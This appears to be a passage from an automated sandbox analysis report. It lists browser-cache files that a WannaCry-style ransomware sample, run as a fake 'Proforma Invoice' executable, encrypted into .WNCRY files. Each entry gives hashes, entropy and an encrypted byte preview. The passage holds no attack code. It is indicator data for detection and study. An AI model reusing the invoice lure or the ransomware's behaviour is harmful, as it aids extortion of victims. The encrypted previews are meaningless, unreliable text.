                                                          Entropy (8bit):7.999564613698158
                                                          Encrypted:true
                                                          SSDEEP:12288:kuqv/cCTS8XQo2M58nvHgSEA50jTwO5i6IhqCDzdfO:bqn7pMaofgSE1A0A9W
                                                          MD5:4811FF9220A36281BF0DA6A2D108B390
                                                          SHA1:24DF01794FF5695152DE4D319C1A5352A1F5DCD0
                                                          SHA-256:6CDD8CFCBD82E3C47AD2276D1B031D44C65D18E499E9E9BAFF875008BE4DB61F
                                                          SHA-512:83ADABC36629C2F2DF264D6378CD69D0D46968FA29A8D1C7EAFAED0BD500E366C924A5C6F26C45F8307CB943110DA8214B6CA1A6A262B582DE85F723886D5C7C
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....<.f.....!Z...h^@4&.....G.<.<t...1.....|.....zYq..f.H....JJHNGN......+.{v.x{.Wz..8.1...]...h5.2..M..k.J..V.z{..8.D..$.-e(..p.-.pD.AC.]......0N....#...id$F.W@.L #.....e...b?..w..H.VfFO....x..N..Q..cQ.s..=7.+r...%.../...<.<:..,........E...o..6M......2X......k..R.7....D .S..a.......$..~.0.....O1....k.1./....Jp..t.......].......w.f.9.`.h.dI..i.\=. ;=.....v.b..;H...D0Y......I....~[...o..|O.}...E).+..56...d..]D.lI..V60`.7...a....7.A........F....p...lk..S.P.g.B.f./.............Z.)....tV..Q.RA.y|."&.U'........E....W]..%M...o `.3.X...2LZz...2.....t..N1..|y.L.~[~c..qX..iQ.].qc7..iUh..:i.{....'.D..fI`....#....Z0.Hk..t8.3z..).^..N...#{Bp..;f..z....$J.UK...s.K .:.m.\.K%.ZR._6...e.k....:..A:.B;.*..=b.A.?......$#....k..=.),dqb@^..3-..a.&D.{@.F."...=....=....3.F..2%.+N..4.X.B.I..=....].._",..v.....T_qQ..$.dU6X.N..x.RN$"..U8.pA....mtZP.7.......;z.........q.>....e.x...-9.e.....=..U9a..-!...j....g...+...0..L...3...z..].:..1.O....V.q0.&..tkR@......#.'U....7.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):416088
                                                          Entropy (8bit):7.999564613698158
                                                          Encrypted:true
                                                          SSDEEP:12288:kuqv/cCTS8XQo2M58nvHgSEA50jTwO5i6IhqCDzdfO:bqn7pMaofgSE1A0A9W
                                                          MD5:4811FF9220A36281BF0DA6A2D108B390
                                                          SHA1:24DF01794FF5695152DE4D319C1A5352A1F5DCD0
                                                          SHA-256:6CDD8CFCBD82E3C47AD2276D1B031D44C65D18E499E9E9BAFF875008BE4DB61F
                                                          SHA-512:83ADABC36629C2F2DF264D6378CD69D0D46968FA29A8D1C7EAFAED0BD500E366C924A5C6F26C45F8307CB943110DA8214B6CA1A6A262B582DE85F723886D5C7C
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....<.f.....!Z...h^@4&.....G.<.<t...1.....|.....zYq..f.H....JJHNGN......+.{v.x{.Wz..8.1...]...h5.2..M..k.J..V.z{..8.D..$.-e(..p.-.pD.AC.]......0N....#...id$F.W@.L #.....e...b?..w..H.VfFO....x..N..Q..cQ.s..=7.+r...%.../...<.<:..,........E...o..6M......2X......k..R.7....D .S..a.......$..~.0.....O1....k.1./....Jp..t.......].......w.f.9.`.h.dI..i.\=. ;=.....v.b..;H...D0Y......I....~[...o..|O.}...E).+..56...d..]D.lI..V60`.7...a....7.A........F....p...lk..S.P.g.B.f./.............Z.)....tV..Q.RA.y|."&.U'........E....W]..%M...o `.3.X...2LZz...2.....t..N1..|y.L.~[~c..qX..iQ.].qc7..iUh..:i.{....'.D..fI`....#....Z0.Hk..t8.3z..).^..N...#{Bp..;f..z....$J.UK...s.K .:.m.\.K%.ZR._6...e.k....:..A:.B;.*..=b.A.?......$#....k..=.),dqb@^..3-..a.&D.{@.F."...=....=....3.F..2%.+N..4.X.B.I..=....].._",..v.....T_qQ..$.dU6X.N..x.RN$"..U8.pA....mtZP.7.......;z.........q.>....e.x...-9.e.....=..U9a..-!...j....g...+...0..L...3...z..].:..1.O....V.q0.&..tkR@......#.'U....7.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\Rdr[1].txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.136563460364328
                                                          Encrypted:false
                                                          SSDEEP:6:bkEOH/uJ4j73F8F8szd+MGx2HnIczWo99wkS/IPtuCuVsRcaC:bkE8uJ4v3zszd+MGxoJzWoTHCOtuf6R+
                                                          MD5:B2591B8A087017D5880AA0746B240093
                                                          SHA1:3F6C2E2AC906AD89B7FC2744DD43DB2D7D7C8AB9
                                                          SHA-256:F0B51E6C5A5C198840C4BBEDA721111EA9BD1C8E8C70232A205A6BCE50B37893
                                                          SHA-512:390030C2569B65E78EF10F6E59E0F9322945939C19DD311CEA8C983B74BA7E4FF4F76E4A905B9B9DB59E367E75A9FC51947E250E0B2CDA668273149A69D98312
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....B.g...~....G2UEb..<S....)%&..'H...USd.1L..|...n.F....F.0X..../.V8[5l.,..).i.......k..[BL{..y.e...5..`.....q.~0...>.....Z..1~..CU.&.Ir.upJ..L..M....w....!&.W..........8%h.a#u......N"..!.X<.XGZ..U.8;.....%....3..W..i.......T....*%aK.V.............dPI..B.i.[.tS@=

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\Rdr[1].txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.136563460364328
                                                          Encrypted:false
                                                          SSDEEP:6:bkEOH/uJ4j73F8F8szd+MGx2HnIczWo99wkS/IPtuCuVsRcaC:bkE8uJ4v3zszd+MGxoJzWoTHCOtuf6R+
                                                          MD5:B2591B8A087017D5880AA0746B240093
                                                          SHA1:3F6C2E2AC906AD89B7FC2744DD43DB2D7D7C8AB9
                                                          SHA-256:F0B51E6C5A5C198840C4BBEDA721111EA9BD1C8E8C70232A205A6BCE50B37893
                                                          SHA-512:390030C2569B65E78EF10F6E59E0F9322945939C19DD311CEA8C983B74BA7E4FF4F76E4A905B9B9DB59E367E75A9FC51947E250E0B2CDA668273149A69D98312
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....B.g...~....G2UEb..<S....)%&..'H...USd.1L..|...n.F....F.0X..../.V8[5l.,..).i.......k..[BL{..y.e...5..`.....q.~0...>.....Z..1~..CU.&.Ir.upJ..L..M....w....!&.W..........8%h.a#u......N"..!.X<.XGZ..U.8;.....%....3..W..i.......T....*%aK.V.............dPI..B.i.[.tS@=

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\90SNK17T\Rdr[1].txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.078390213915426
                                                          Encrypted:false
                                                          SSDEEP:6:bkENbQnFv/xhc0kt67iE5yJCzsl5cTGHw9uRDZw1CafPdPzO:bkEunFnKE7iI7zsjUGQ9uRFkNi
                                                          MD5:8B37D6BA25E74F63E93D428208C02C91
                                                          SHA1:5F8A84841670A78A495FDFC0061AE52895005BE9
                                                          SHA-256:284E3B70FEAD3ADBA9BC5EFDA4943540CFFD8327DC48808A58EEBA0EE35C2158
                                                          SHA-512:8D4314E3E393CC4E2E8A306840D0D5B7E414713F0AEFB20AFF2BECE293A8E2E5DAF4E00C1179247A6F0E05A086DB9E2DBD47FEE4B732B41A8B2445FCF872F50D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...........[.B.B..o4.M.a.%\M..%..B.M...*...*w'{........La....8.l/.{)9.h.3....h...S..6.]...{H...\y.[...p.B...Vp.F.../..b.IU...Zp.>p.'1..I.-3...f...2....P*.c.....a..C.n.~3.. .LK....."v.Y2B;P./.f%..-1;.st.y..h.{...Vh8..N.^|... !$.}w..U.7...=..^Y...'.z>.................."W..h...TG.....

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\90SNK17T\Rdr[1].txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.078390213915426
                                                          Encrypted:false
                                                          SSDEEP:6:bkENbQnFv/xhc0kt67iE5yJCzsl5cTGHw9uRDZw1CafPdPzO:bkEunFnKE7iI7zsjUGQ9uRFkNi
                                                          MD5:8B37D6BA25E74F63E93D428208C02C91
                                                          SHA1:5F8A84841670A78A495FDFC0061AE52895005BE9
                                                          SHA-256:284E3B70FEAD3ADBA9BC5EFDA4943540CFFD8327DC48808A58EEBA0EE35C2158
                                                          SHA-512:8D4314E3E393CC4E2E8A306840D0D5B7E414713F0AEFB20AFF2BECE293A8E2E5DAF4E00C1179247A6F0E05A086DB9E2DBD47FEE4B732B41A8B2445FCF872F50D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...........[.B.B..o4.M.a.%\M..%..B.M...*...*w'{........La....8.l/.{)9.h.3....h...S..6.]...{H...\y.[...p.B...Vp.F.../..b.IU...Zp.>p.'1..I.-3...f...2....P*.c.....a..C.n.~3.. .LK....."v.Y2B;P./.f%..-1;.st.y..h.{...Vh8..N.^|... !$.}w..U.7...=..^Y...'.z>.................."W..h...TG.....

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\90SNK17T\oneDs_f2e0f4a029670f10d892[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):190440
                                                          Entropy (8bit):7.999208312385713
                                                          Encrypted:true
                                                          SSDEEP:3072:XZmAl9p3C56MjCF80+lRAhJj3KP8TTRI+sdcNOkkpBglFbmBJeEMVnUs0WNy8r2K:Jm+9oS8zWhzTTRIrdcUNp22HBAUT22RU
                                                          MD5:3D1A4145E2C2B7DC7F8B2D2C16BB03F4
                                                          SHA1:637CFDA3975C0421D6F24616E3F017C77808F974
                                                          SHA-256:CB679C1CE23CD074DCFC5C3BC7119DC983E1FF16F69F9BF2AE1A7C72EF4FAC9C
                                                          SHA-512:08534C336B3CD54E2EBB085D8E823F31B38BC37FD53082AF8D3D28928A8A922D0A7CD0602FCD5A54C1C122E8CCC60DC4B2D96DA6D584D943B237CB72DBA3CF44
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......5...q.Pg..Q.O.,..........=e.F.......o[G.....q....~D....,...D...Z.-.A......~.._.).(..;^..,.*.6.....az.A...-w.@w..Q.Mop..N.L...(..'8#..............8.{...........r.....Y..JE\..;.@..jM'n.%rV.19;......|y(.-..U...b...L.+.F{*.;.A.~DU......R.i..............(...NPa.....!h.I>.\....;....."]......2.K......S#.bX98..su....l..Q.....$Rg...9....[>..........m.\.Q3...T7.r....ee....dSXK8t?.....v.&.T..J...Q..L..B.^.........Gs.zy{.9.%....^i.U..[..v...G=...u.|D7......U.Be.V..T..)MMO....;...Va.I.2...s..... .z.`_.x..l.....N...0.$.....*;U...-.VR...F.+.!....T!/..<Xb..5@j....%f.<.+...#.J}%...`I.....P.ZE...u.....*..y...sD...?..Z<f.?.s..fE/.-qy..H..)...t[...&;...|...9...t.U..J.\.<.....P.!.}..S1zyT..vX.;.]..%.M.i...I.R"3P....v.5..&.m....F...4.Bc....&.*&k.J!...L.% I./.m,...$.=^.......'.....5.nX......v..w'2.".p...S.hF...C..=..jK......^.A....`g),... t.Y. e.Bk.JP.}..=.'..N......P.T..b|~h..;.V..bD..Kj.]0?.WT....a..z.x...=E.X....`.<...mk....Q....

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\90SNK17T\oneDs_f2e0f4a029670f10d892[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):190440
                                                          Entropy (8bit):7.999208312385713
                                                          Encrypted:true
                                                          SSDEEP:3072:XZmAl9p3C56MjCF80+lRAhJj3KP8TTRI+sdcNOkkpBglFbmBJeEMVnUs0WNy8r2K:Jm+9oS8zWhzTTRIrdcUNp22HBAUT22RU
                                                          MD5:3D1A4145E2C2B7DC7F8B2D2C16BB03F4
                                                          SHA1:637CFDA3975C0421D6F24616E3F017C77808F974
                                                          SHA-256:CB679C1CE23CD074DCFC5C3BC7119DC983E1FF16F69F9BF2AE1A7C72EF4FAC9C
                                                          SHA-512:08534C336B3CD54E2EBB085D8E823F31B38BC37FD53082AF8D3D28928A8A922D0A7CD0602FCD5A54C1C122E8CCC60DC4B2D96DA6D584D943B237CB72DBA3CF44
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......5...q.Pg..Q.O.,..........=e.F.......o[G.....q....~D....,...D...Z.-.A......~.._.).(..;^..,.*.6.....az.A...-w.@w..Q.Mop..N.L...(..'8#..............8.{...........r.....Y..JE\..;.@..jM'n.%rV.19;......|y(.-..U...b...L.+.F{*.;.A.~DU......R.i..............(...NPa.....!h.I>.\....;....."]......2.K......S#.bX98..su....l..Q.....$Rg...9....[>..........m.\.Q3...T7.r....ee....dSXK8t?.....v.&.T..J...Q..L..B.^.........Gs.zy{.9.%....^i.U..[..v...G=...u.|D7......U.Be.V..T..)MMO....;...Va.I.2...s..... .z.`_.x..l.....N...0.$.....*;U...-.VR...F.+.!....T!/..<Xb..5@j....%f.<.+...#.J}%...`I.....P.ZE...u.....*..y...sD...?..Z<f.?.s..fE/.-qy..H..)...t[...&;...|...9...t.U..J.\.<.....P.!.}..S1zyT..vX.;.]..%.M.i...I.R"3P....v.5..&.m....F...4.Bc....&.*&k.J!...L.% I./.m,...$.=^.......'.....5.nX......v..w'2.".p...S.hF...C..=..jK......^.A....`g),... t.Y. e.Bk.JP.}..=.'..N......P.T..b|~h..;.V..bD..Kj.]0?.WT....a..z.x...=E.X....`.<...mk....Q....

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qoVhSFA2[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):38056
                                                          Entropy (8bit):7.994575809343454
                                                          Encrypted:true
                                                          SSDEEP:768:awaEop0eQZ1Btg4XfvN/cyiMBImyKz2v6Tb2oSZchB8VRoxzRe:asop0dZ13gEfZiEImmnZ2B8VRoxde
                                                          MD5:CDF71B292AE23A49518054115605AD9B
                                                          SHA1:1004BA4F9978BA90CB05A54413E57F16414B170F
                                                          SHA-256:13EB4BD3A4F74857D34ADC6A662F6E6AF21E6EA38574F87B883DB9DEF309D979
                                                          SHA-512:6AC9793AC4076DA40959D4797B8F36A0505AB9F3D5FE0C9C943FDEE1829584A10DA82495F1D4693C631ECDF8CA370F962A11A4C9A9DFAB3680AC0B57B04FD7E8
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.............s.kt.....F!&..=<.E..)4.....M.3..{<...1..SX6nk^.N...-....t&....4hV=.3C.07..6..:..i|I .....C.?..~..cO...M.....E.....g..r@....L.xR.5.7.4...R...X*.d*~.......-....f..i.h..\.(.!'..B.&.........g..1....gi.jc...Y.;.l..24..>.....6.v.Fx.u.._................I.A...i...h.S.z...E,.5.Og..v(=..........y.....u.H...>3.yQ8/$}..~0".B.~...p(..W/."...s...E..a...10.wj.v..N.......~kO5q0pX.~b.`2.\r...{..".&..s.^..cr....9Z..N...t./.!.s...%z.q.Xy6..MvE&.....KX...w. [.17,Xg.*...~J..a=.|....D..B3..-.iE.....X....c"...R.a..c..'.5..V.....5...CQ.%.G.a..W...1....YI..x._..0 Vl.......}..%....a.G....Z.0\n..k{.Hp.E:n.[..`.=..E[......Aj..#...w.mc.u...zU....*F.......N.I.J.....,....t.T,5.I.kD..~.Y....8hfr..1L{.Bo.ow}......`.8%.b@..B..u......z.x...dz.PG.......a..4....J.YA...]T...+..jH0.E..I..2..Ng...y".-...R.\^rO5....J..X;..\,..8zWs..fX-.!.s.{.Xt..}..-..r|9........\b^.......0.O..Ka........?.uo...i..ra...f.r(./..$.D....sb.#.4W.N.;....&d.2?m..!.....t\Um..4.%`.v...%

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qoVhSFA2[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):38056
                                                          Entropy (8bit):7.994575809343454
                                                          Encrypted:true
                                                          SSDEEP:768:awaEop0eQZ1Btg4XfvN/cyiMBImyKz2v6Tb2oSZchB8VRoxzRe:asop0dZ13gEfZiEImmnZ2B8VRoxde
                                                          MD5:CDF71B292AE23A49518054115605AD9B
                                                          SHA1:1004BA4F9978BA90CB05A54413E57F16414B170F
                                                          SHA-256:13EB4BD3A4F74857D34ADC6A662F6E6AF21E6EA38574F87B883DB9DEF309D979
                                                          SHA-512:6AC9793AC4076DA40959D4797B8F36A0505AB9F3D5FE0C9C943FDEE1829584A10DA82495F1D4693C631ECDF8CA370F962A11A4C9A9DFAB3680AC0B57B04FD7E8
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.............s.kt.....F!&..=<.E..)4.....M.3..{<...1..SX6nk^.N...-....t&....4hV=.3C.07..6..:..i|I .....C.?..~..cO...M.....E.....g..r@....L.xR.5.7.4...R...X*.d*~.......-....f..i.h..\.(.!'..B.&.........g..1....gi.jc...Y.;.l..24..>.....6.v.Fx.u.._................I.A...i...h.S.z...E,.5.Og..v(=..........y.....u.H...>3.yQ8/$}..~0".B.~...p(..W/."...s...E..a...10.wj.v..N.......~kO5q0pX.~b.`2.\r...{..".&..s.^..cr....9Z..N...t./.!.s...%z.q.Xy6..MvE&.....KX...w. [.17,Xg.*...~J..a=.|....D..B3..-.iE.....X....c"...R.a..c..'.5..V.....5...CQ.%.G.a..W...1....YI..x._..0 Vl.......}..%....a.G....Z.0\n..k{.Hp.E:n.[..`.=..E[......Aj..#...w.mc.u...zU....*F.......N.I.J.....,....t.T,5.I.kD..~.Y....8hfr..1L{.Bo.ow}......`.8%.b@..B..u......z.x...dz.PG.......a..4....J.YA...]T...+..jH0.E..I..2..Ng...y".-...R.\^rO5....J..X;..\,..8zWs..fX-.!.s.{.Xt..}..-..r|9........\b^.......0.O..Ka........?.uo...i..ra...f.r(./..$.D....sb.#.4W.N.;....&d.2?m..!.....t\Um..4.%`.v...%

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOqiqEgQ2[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):36888
                                                          Entropy (8bit):7.994594501066197
                                                          Encrypted:true
                                                          SSDEEP:384:qfIxzwkqOF2tLB1wbCSMN6gOhTFqlx5YBpTJchjLnWRcFAx4xiiquxUeUgJuxE1j:1xzhvwL34/w9vJuALpc/EWOzeKvmEdR
                                                          MD5:135B8B51F31F3EB80B8FABF1F75C46B4
                                                          SHA1:E060A49C4E4583A17C592DC0F9148BC6187E8AF1
                                                          SHA-256:545ECC5A3A6AB35503117D5D625299A533FE20F32A7835E4A43008E1C052A835
                                                          SHA-512:12A9014D426E2C314629D1447E1C6C9B503B51A18F264045DFE4C2A7FE81D8373CA51D1C143C5D7EE7A24A0CCE8F280E375E11E653ED5C1A2C76C2146D00CF66
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........Y.V.6".{...Q...,..F.$.d....8..&h...i.~e....;.....G....KMM.....*O..Z(],_..C..B.$e.)..r..R.....(`~.wE....-......z.o".ci..H..OP.R}.......".....Z....om.`vb..PA....$x!.9.w.S.S..TM.....F....yl...`A{.T......J..c..}.....Va.R.DR..........F...>.i[.............kU..p.w2....V.....?..Pym.{.U....tX^.>-iG...`...3G.p......._.bKV.d....l.W)Z.?H|...2;..../...\ ..>|FO..........ws1K......U..5....Y./....G.....tS.*..T.k{.U:i.R..;..,.l.:f........2......|....;..F..R.gh...R.~.c]v....P...Y.p..jM.0V.)..BZ.*.........K......to..x....Ej1X3.4.V.6..$a$.B<...g.1..^u..xw6_a..!...$C.\E..=zV....._M..0..9..U...iC..e....@E..0.e....Wt/b.i).g .Y)>6^...9.#.$j...V...W..^|..M....B......Y.R....Rg .F>....@....l..rv...[`...-...5....)..$#..x...I.`.x..e.... ..^@b......w...'G.~.0A...l..Q.Z...`..V..`......mJ^y.........g.>... ..v.f.k...=..M..e..I.02!....K.1".....T!.}TsE...s..5..x*.0$.QV<t.=..GyeC7..|..it.BGX...6M....z8w..[2.;f..UhF.yP...'..6!..t.v7,8.-.f.......C.>....W.u...

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOqiqEgQ2[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):36888
                                                          Entropy (8bit):7.994594501066197
                                                          Encrypted:true
                                                          SSDEEP:384:qfIxzwkqOF2tLB1wbCSMN6gOhTFqlx5YBpTJchjLnWRcFAx4xiiquxUeUgJuxE1j:1xzhvwL34/w9vJuALpc/EWOzeKvmEdR
                                                          MD5:135B8B51F31F3EB80B8FABF1F75C46B4
                                                          SHA1:E060A49C4E4583A17C592DC0F9148BC6187E8AF1
                                                          SHA-256:545ECC5A3A6AB35503117D5D625299A533FE20F32A7835E4A43008E1C052A835
                                                          SHA-512:12A9014D426E2C314629D1447E1C6C9B503B51A18F264045DFE4C2A7FE81D8373CA51D1C143C5D7EE7A24A0CCE8F280E375E11E653ED5C1A2C76C2146D00CF66
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........Y.V.6".{...Q...,..F.$.d....8..&h...i.~e....;.....G....KMM.....*O..Z(],_..C..B.$e.)..r..R.....(`~.wE....-......z.o".ci..H..OP.R}.......".....Z....om.`vb..PA....$x!.9.w.S.S..TM.....F....yl...`A{.T......J..c..}.....Va.R.DR..........F...>.i[.............kU..p.w2....V.....?..Pym.{.U....tX^.>-iG...`...3G.p......._.bKV.d....l.W)Z.?H|...2;..../...\ ..>|FO..........ws1K......U..5....Y./....G.....tS.*..T.k{.U:i.R..;..,.l.:f........2......|....;..F..R.gh...R.~.c]v....P...Y.p..jM.0V.)..BZ.*.........K......to..x....Ej1X3.4.V.6..$a$.B<...g.1..^u..xw6_a..!...$C.\E..=zV....._M..0..9..U...iC..e....@E..0.e....Wt/b.i).g .Y)>6^...9.#.$j...V...W..^|..M....B......Y.R....Rg .F>....@....l..rv...[`...-...5....)..$#..x...I.`.x..e.... ..^@b......w...'G.~.0A...l..Q.Z...`..V..`......mJ^y.........g.>... ..v.f.k...=..M..e..I.02!....K.1".....T!.}TsE...s..5..x*.0$.QV<t.=..GyeC7..|..it.BGX...6M....z8w..[2.;f..UhF.yP...'..6!..t.v7,8.-.f.......C.>....W.u...

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\ReportOwner[1].txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.087131249398959
                                                          Encrypted:false
                                                          SSDEEP:6:bkElR+iSwWJ7m24VKsFjQg1y9onvooLe/ucW+TgcYRfBsCGKh2YkKTEhmDcu+:bkE7+p7BYK3afJc1YBjH2YkKwhmDG
                                                          MD5:B093BF6E8AC299815996132B580A9E02
                                                          SHA1:14B1D3AF1BF5D0160140D6ECC6216446C40CF6B9
                                                          SHA-256:CD3C16B96ED8E044AB65C0258E6F60B11B55A6632EBF76E935C54CDEEE0D4B76
                                                          SHA-512:E269EAFDD49E1952819DB5917DF8B5ADE7F3DA44299456DF924A3D9CC0B95D1D7327D2F08D6275FB9CB191E2398F36E8AEC2007F0968D9C3C1E2402AA6E8A78A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........3....9....9..h.s.p.v....A]M.....nQ.S.....$...;.p/R...(.U..#.^...n.....D.q....Z-....1>......u...W*[Ot...)......,a...........9ro...7.p.-Z.^E.j..}]...x}..3....c..1....'......VdX.-..g..z..R5......j.....M=.....9t<.&..t .A<1o.%...................W..SG.G~..+...

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\ReportOwner[1].txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.087131249398959
                                                          Encrypted:false
                                                          SSDEEP:6:bkElR+iSwWJ7m24VKsFjQg1y9onvooLe/ucW+TgcYRfBsCGKh2YkKTEhmDcu+:bkE7+p7BYK3afJc1YBjH2YkKwhmDG
                                                          MD5:B093BF6E8AC299815996132B580A9E02
                                                          SHA1:14B1D3AF1BF5D0160140D6ECC6216446C40CF6B9
                                                          SHA-256:CD3C16B96ED8E044AB65C0258E6F60B11B55A6632EBF76E935C54CDEEE0D4B76
                                                          SHA-512:E269EAFDD49E1952819DB5917DF8B5ADE7F3DA44299456DF924A3D9CC0B95D1D7327D2F08D6275FB9CB191E2398F36E8AEC2007F0968D9C3C1E2402AA6E8A78A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........3....9....9..h.s.p.v....A]M.....nQ.S.....$...;.p/R...(.U..#.^...n.....D.q....Z-....1>......u...W*[Ot...)......,a...........9ro...7.p.-Z.^E.j..}]...x}..3....c..1....'......VdX.-..g..z..R5......j.....M=.....9t<.&..t .A<1o.%...................W..SG.G~..+...

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\C7S8M5VS\ProcessMAU[1].txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.072244857653795
                                                          Encrypted:false
                                                          SSDEEP:6:bkEST0osT9ZnVEAnTEF921HV+//IbsZqMkPyZhGtFW9zRORi+GDRzM/b9DDi:bkESTLsT9ZV7TzVhe3kPKhAsOSzgo
                                                          MD5:714861836C8C711B1A6B8B9E8B40CF46
                                                          SHA1:ACF91D54CA8C128D6D89BE2A911C7A4DEB08B01E
                                                          SHA-256:1EEED76C8D8A3FE0D27B33FF3934C7149DE0C4EC1264C36E4867AD7131E9E4F2
                                                          SHA-512:1683F753F203306FC6B94835AD40B483262D91DD7DB37421780699C30FE10FEAFB465D33C4ACD45F314A0D6615BD73E46CE7C7542733145B9F43520CE15CE6F5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Oy..V.f....*xILC..N$....u..K...Qq3_..Y..F]...Q.S.......PQ.f.h+5...N5..;.K.....L..)...2..c..[?*.L=.we.....j..EZ.......mal;'.jF.e.h.yb.....L.+.;....)S..u.a..g#.T.J1$a..x.....Z(..;./...........5...t.G#..W.....@0..=..+y.j.......>..]$.;... .8../N............[.LwR.@.!.P.F/.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\C7S8M5VS\ProcessMAU[1].txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.072244857653795
                                                          Encrypted:false
                                                          SSDEEP:6:bkEST0osT9ZnVEAnTEF921HV+//IbsZqMkPyZhGtFW9zRORi+GDRzM/b9DDi:bkESTLsT9ZV7TzVhe3kPKhAsOSzgo
                                                          MD5:714861836C8C711B1A6B8B9E8B40CF46
                                                          SHA1:ACF91D54CA8C128D6D89BE2A911C7A4DEB08B01E
                                                          SHA-256:1EEED76C8D8A3FE0D27B33FF3934C7149DE0C4EC1264C36E4867AD7131E9E4F2
                                                          SHA-512:1683F753F203306FC6B94835AD40B483262D91DD7DB37421780699C30FE10FEAFB465D33C4ACD45F314A0D6615BD73E46CE7C7542733145B9F43520CE15CE6F5
                                                          Malicious:false
                                                          Reputation:unknown
